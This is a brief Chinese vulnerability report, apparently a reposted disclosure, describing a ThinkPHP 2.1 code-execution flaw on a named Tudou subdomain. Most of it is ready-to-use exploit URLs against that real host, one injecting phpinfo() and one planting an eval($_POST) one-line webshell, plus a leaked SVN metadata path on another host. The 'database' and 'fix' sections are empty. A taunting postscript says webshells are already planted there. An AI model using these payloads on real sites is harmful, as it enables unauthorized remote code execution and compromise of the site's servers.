土豆某站代码执行1.土豆某个网站使用ThinkPHP 2.1的框架导致代码执行漏洞,虽然修补了其它的几个代码执行漏洞,但是现在我提到的这个漏洞却没有修复。如下:
http://club3.bmw.tudou.com/?s=/a/a/a/{${phpinfo()}}
2.直接构造一句话木马,
http://club3.bmw.tudou.com/?s=/a/a/a/{${eval($_POST[u])}}
3.database:
4.svn泄漏:
http://a.tudou.com/testbwm/.svn/entries
修复方案:
PS:我不会告诉你上面已经有很多人的大马小马一句话马了,所以你还是自己多发点奖金给自己的安全部门员工吧,不然他们不会认真工作搞好防黑客的网络安全工作哦
版权与免责声明:
凡注明稿件来源的内容均为转载稿或由网友用户注册发布,本网转载出于传递更多信息的目的;如转载稿涉及版权问题,请作者联系我们,同时对于用户评论等信息,本网并不意味着赞同其观点或证实其内容的真实性;